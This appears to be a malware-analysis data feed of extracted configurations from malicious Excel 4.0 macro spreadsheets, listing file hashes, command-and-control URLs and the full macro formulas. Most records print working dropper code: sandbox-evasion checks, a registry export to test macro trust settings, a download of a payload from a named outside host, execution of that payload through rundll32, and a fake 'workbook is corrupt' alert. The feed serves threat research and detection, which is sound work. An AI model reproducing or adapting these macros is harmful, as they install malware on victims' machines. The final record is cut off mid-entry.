{"version":"0.2","sample":{"sample":"","kind":"file","target":"5a16f5fd39f29249f587eb7023c8cf61baf5c5280272745c06702be46cf6f55d"},"analysis":{"reported":"2020-04-09T16:16:27Z","score":10},"files":[{"filename":"5a16f5fd39f29249f587eb7023c8cf61baf5c5280272745c06702be46cf6f55d","filesize":225280,"md5":"6dd3885dc62f431e7cdd10d164a25059","sha1":"c6b2f6fed90e96990540a79f80d8e0c90e127ed5","sha256":"5a16f5fd39f29249f587eb7023c8cf61baf5c5280272745c06702be46cf6f55d","sha512":"c69ec73c6f7a4e20e6033dce370bd29dbdc44fb5e932c60c6e96f9e215099e3424fb0ddad5e3868c51ad36897d7e46bf73102999cb0bcb38fc3af20fd2da9816","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5a16f5fd39f29249f587eb7023c8cf61baf5c5280272745c06702be46cf6f55d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VIROtZAObp\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5a190a2b186cd6c11865ad8d9df2f569c73c790e01889e7aa754fb1cb1467044"},"analysis":{"reported":"2020-04-09T16:16:27Z","score":10},"files":[{"filename":"5a190a2b186cd6c11865ad8d9df2f569c73c790e01889e7aa754fb1cb1467044","filesize":219136,"md5":"7f6244cf9b0b16b67405a07a57d494ca","sha1":"11dc5172a9dce49963b64be8fd6a3355e83e4f2e","sha256":"5a190a2b186cd6c11865ad8d9df2f569c73c790e01889e7aa754fb1cb1467044","sha512":"418fb290a6e64b9037c871720b2610d90b805f8c6a221a54f0a218ca08fc7ba560b2c8183c4c181c8abeac8cfa7c5ae2fc546740e4c540a21a19526b700d0438","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5a190a2b186cd6c11865ad8d9df2f569c73c790e01889e7aa754fb1cb1467044.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ycfGmTrRrI\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5a33dc0e070706f4bdc46e5ea237d6ca3a603cc25036584b9f2d2f812141e445"},"analysis":{"reported":"2020-04-09T16:16:27Z","score":10},"files":[{"filename":"5a33dc0e070706f4bdc46e5ea237d6ca3a603cc25036584b9f2d2f812141e445","filesize":167936,"md5":"71a1130a22d67867a2a21b362d5a801c","sha1":"7a7ad9ee822a72fb0b30f7f146b0e24bb27c7af8","sha256":"5a33dc0e070706f4bdc46e5ea237d6ca3a603cc25036584b9f2d2f812141e445","sha512":"f59379bf836c066950c091b75125335aa34c5c762c7411340195396d5f348c1a5ffdbf454f0770b25475eba5959b148970250cd0eb4f10cc7eb8661424bb323a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5a33dc0e070706f4bdc46e5ea237d6ca3a603cc25036584b9f2d2f812141e445.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KCIlutKNOa\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5a47943cf39e19447af7510613540127e892b4c2c2c53835dee0143aff4936b2"},"analysis":{"reported":"2020-04-09T16:16:27Z","score":10},"files":[{"filename":"5a47943cf39e19447af7510613540127e892b4c2c2c53835dee0143aff4936b2","filesize":209920,"md5":"d92602b809fea83d297d5653b3c34578","sha1":"c648cc78b0111772fd715091ef20bd172b1e0283","sha256":"5a47943cf39e19447af7510613540127e892b4c2c2c53835dee0143aff4936b2","sha512":"7e7cc5c48c8ceb9848611f69992b1505d3b7090ba37e775b6d0b76d3cb2d2f5d5bad8df5b1a97366d58057a382f9de06eea6296e6c8bb2e06afdd3d0f04240e5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5a47943cf39e19447af7510613540127e892b4c2c2c53835dee0143aff4936b2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ysvf3gCK2s\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5a4b2e224e3c74f5deaa9c7eb4d869f93bb3cee474afcc9cdcf11b5dbfd5c3e4"},"analysis":{"reported":"2020-04-09T16:16:27Z","score":10},"files":[{"filename":"5a4b2e224e3c74f5deaa9c7eb4d869f93bb3cee474afcc9cdcf11b5dbfd5c3e4","filesize":185344,"md5":"a3b1c36d70abf4c8192b3856b5f34b9c","sha1":"dbe563956da7ab0b9e189b9e2a06d33b64063d84","sha256":"5a4b2e224e3c74f5deaa9c7eb4d869f93bb3cee474afcc9cdcf11b5dbfd5c3e4","sha512":"9b08f28655186e3e1a8ce54ccb0ffe8b5c8d176ef38fa8db62c91a7157d42b977ec9a52f874aac219d4b9c4e961e17125da99c3baa74137bd0537e0f18fd0879","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5a4b2e224e3c74f5deaa9c7eb4d869f93bb3cee474afcc9cdcf11b5dbfd5c3e4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5a6ccc6af804854f614c3ba9824da0e553e90dccd49310b168ce6be69bc6ff12"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5a6ccc6af804854f614c3ba9824da0e553e90dccd49310b168ce6be69bc6ff12","filesize":104448,"md5":"a1dd1eaa70196d55c084370cc189c438","sha1":"9ca193395de641cfb99735070d44d8b0c4e74462","sha256":"5a6ccc6af804854f614c3ba9824da0e553e90dccd49310b168ce6be69bc6ff12","sha512":"9135bc6d105bb2cb767f5ab41bd16314b32dfa70bc6e682fd3680fb64de92d27cb2f693cc304220fd92270dba9f3baa59c0583f2b1a43d61db60371af35fab36","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5a6ccc6af804854f614c3ba9824da0e553e90dccd49310b168ce6be69bc6ff12.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"HdueeRsgls\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5a752a4e568f910f7b7253e324b4bfa656b1c177ce90a652fc65300002d4e33f"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5a752a4e568f910f7b7253e324b4bfa656b1c177ce90a652fc65300002d4e33f","filesize":95232,"md5":"95799650b7ddaed037c9567149c70c7b","sha1":"c9d00e50a7981e349109eef03411fe16dd54b9dd","sha256":"5a752a4e568f910f7b7253e324b4bfa656b1c177ce90a652fc65300002d4e33f","sha512":"03492986e97aadc40e5d23957bf71ab5c7588aff9bd60fa02eb39d65c636ef3f1185b8d15e9a7dcc5ddc64ad164d0f5f3169216aa5faafda2d93b727bc72ce86","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5a752a4e568f910f7b7253e324b4bfa656b1c177ce90a652fc65300002d4e33f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt18.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\RNBWMDR\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\RNBWMDR\\bKKwjKg\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt18.dl\",\"C:\\RNBWMDR\\bKKwjKg\\tIpHswW.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\RNBWMDR\\bKKwjKg\\tIpHswW.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5a8d3495f7b6afcd46ece8b81dac821c9e02815e5aff0c24f0e5d9c3cb6464f9"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5a8d3495f7b6afcd46ece8b81dac821c9e02815e5aff0c24f0e5d9c3cb6464f9","filesize":112128,"md5":"65db8679b26043ebd2329c1f4346c572","sha1":"7aeda46c0053c820453f47577ea9ebc0eaa393ec","sha256":"5a8d3495f7b6afcd46ece8b81dac821c9e02815e5aff0c24f0e5d9c3cb6464f9","sha512":"5b91aef1a6d4a55ca6a4f547c394bc853b705572041ab33c0ee243c91234f5bcebc1a92e4e84731c7937a0add5d3afb6f99d288a80559a86dabffa51a2f84be5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5a8d3495f7b6afcd46ece8b81dac821c9e02815e5aff0c24f0e5d9c3cb6464f9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5aa5bd2192b2b4fbf6f8c6d5f88bb2e5bba3a27153c9f28d8f561333a352e39d"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5aa5bd2192b2b4fbf6f8c6d5f88bb2e5bba3a27153c9f28d8f561333a352e39d","filesize":185344,"md5":"2e5ce04596203c88a3ee20763259e217","sha1":"1c3dc194ac5269a9a4d1fb9fea0134920fa1225b","sha256":"5aa5bd2192b2b4fbf6f8c6d5f88bb2e5bba3a27153c9f28d8f561333a352e39d","sha512":"35749495dd528842d78f94bc00e8b697efa49d1b411cae535b73bc1f58a1bb36289916d7ebb4026515a177f1c989ad567e609708e4b57d310e7552da44bb6d6d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5aa5bd2192b2b4fbf6f8c6d5f88bb2e5bba3a27153c9f28d8f561333a352e39d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5ab3254e2fa9d1ebda8fb5ae3a856b55d0ff3b552aa2f41ce743f44f28f965db"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5ab3254e2fa9d1ebda8fb5ae3a856b55d0ff3b552aa2f41ce743f44f28f965db","filesize":221184,"md5":"4f7a218d05ff508d1ebe1e092c06ffc1","sha1":"2a8b98012982209106effe73882ba5f3a7300399","sha256":"5ab3254e2fa9d1ebda8fb5ae3a856b55d0ff3b552aa2f41ce743f44f28f965db","sha512":"633b721d492d127e5c77e9242e06c02c15eb7f7604ee72d9681e4c9b59e2e63c32a9b106723b1447b44a2762298ffc993df274ac60789ce91763747031c8cc79","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5ab3254e2fa9d1ebda8fb5ae3a856b55d0ff3b552aa2f41ce743f44f28f965db.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BBvDPbpDZc\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5ab491b8dd30ede388c9ed81453b9e6ff49606d76c526a8085ad4ee30b0cb5a2"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5ab491b8dd30ede388c9ed81453b9e6ff49606d76c526a8085ad4ee30b0cb5a2","filesize":112128,"md5":"83371b27f4727405ce8e878bc85a3c5f","sha1":"3c4ba4f7f7a983c33925fc0724e4ce66d1721e70","sha256":"5ab491b8dd30ede388c9ed81453b9e6ff49606d76c526a8085ad4ee30b0cb5a2","sha512":"3398a5b25b085d7083283538f63cfa3e02244ad518db864dfd9cb106852520a268b792df81e6547bb1323c8017761e76548b4eb886cc5ccda8e58faad8c3e4d2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5ab491b8dd30ede388c9ed81453b9e6ff49606d76c526a8085ad4ee30b0cb5a2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5aeded87ee2ae71c318e239ba1a854047014741ec830dd857a68c7e886523100"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5aeded87ee2ae71c318e239ba1a854047014741ec830dd857a68c7e886523100","filesize":209920,"md5":"43a26f21fad6c934e64ccbed3d26a164","sha1":"dd08405e7395bcda6d38893105da868c1b41f348","sha256":"5aeded87ee2ae71c318e239ba1a854047014741ec830dd857a68c7e886523100","sha512":"5dbf809f9eafdd18b04492ba6b49fbdf3d060caca4fd6c47cc4bbde5d3485d5f19d52c6876caa73e31ae010e1d3b9bedd535d0f619023e828c98554614b93f03","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5aeded87ee2ae71c318e239ba1a854047014741ec830dd857a68c7e886523100.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qiTdQfwBzb\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5aee0a6f2ea335edc25f4d7e3297d8f323f5667a19f3a4cdaf8ffa985db39769"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5aee0a6f2ea335edc25f4d7e3297d8f323f5667a19f3a4cdaf8ffa985db39769","filesize":207360,"md5":"1b659b40a94d1bc6001478d21d0919ae","sha1":"143f9cc46ffc9d79ec9adcdaf1f1866b6ff45261","sha256":"5aee0a6f2ea335edc25f4d7e3297d8f323f5667a19f3a4cdaf8ffa985db39769","sha512":"c5681dbb64525ab02bcfef31d313f2010f3a5e3f2b84d29ce0d8804c75ab69b05a81d6b828f8b8f8a795196c109d50264e926d1d1c3f7e66af977efd3d457c47","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5aee0a6f2ea335edc25f4d7e3297d8f323f5667a19f3a4cdaf8ffa985db39769.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-cran.php","https://narensyndicate.com/wp-cran.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-cran.php\",\"c:\\Users\\Public\\cskc75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-cran.php\",\"c:\\Users\\Public\\cskc75ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cskc75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NZ1D1vLDyg\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b164a6114850c8e04bdc44d747437ef89f6f4c588fa4dbd3ce353be9cfd32af"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5b164a6114850c8e04bdc44d747437ef89f6f4c588fa4dbd3ce353be9cfd32af","filesize":116224,"md5":"3c3cd6e7773a49eb992bb258f11a68cd","sha1":"09531e558473a0d5b97b78bec9ef973a3a4cc2a7","sha256":"5b164a6114850c8e04bdc44d747437ef89f6f4c588fa4dbd3ce353be9cfd32af","sha512":"7e5b46e13c4fc21dda45966dba1cb68dbbadd728133c12b9116a97aacabe9c7bd7450f2d04435143676cbef66978e3c74449ad6c95afc5882aa436e0409d8c76","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b164a6114850c8e04bdc44d747437ef89f6f4c588fa4dbd3ce353be9cfd32af.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VikGdwqhQE\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5b24ae53d07b3536b4ad3a5a15f2753c907368d1f06f60b67c6ef4c994104be5"},"analysis":{"reported":"2020-04-09T16:16:28Z","score":10},"files":[{"filename":"5b24ae53d07b3536b4ad3a5a15f2753c907368d1f06f60b67c6ef4c994104be5","filesize":209408,"md5":"37468730f03bca6da85fc435a88f3b8b","sha1":"cb42b3377e6cca75a8bc7ae05fcea414d9fd4b7d","sha256":"5b24ae53d07b3536b4ad3a5a15f2753c907368d1f06f60b67c6ef4c994104be5","sha512":"c94bf606882704ff5dd3b4506eb7e1c1d7b0e9cee24c94fe3edf7a9272fca180db33bf4e2ace339854f35fee35c2d69ee71cdef865f7b2a412103841b3f2a40a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5b24ae53d07b3536b4ad3a5a15f2753c907368d1f06f60b67c6ef4c994104be5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, 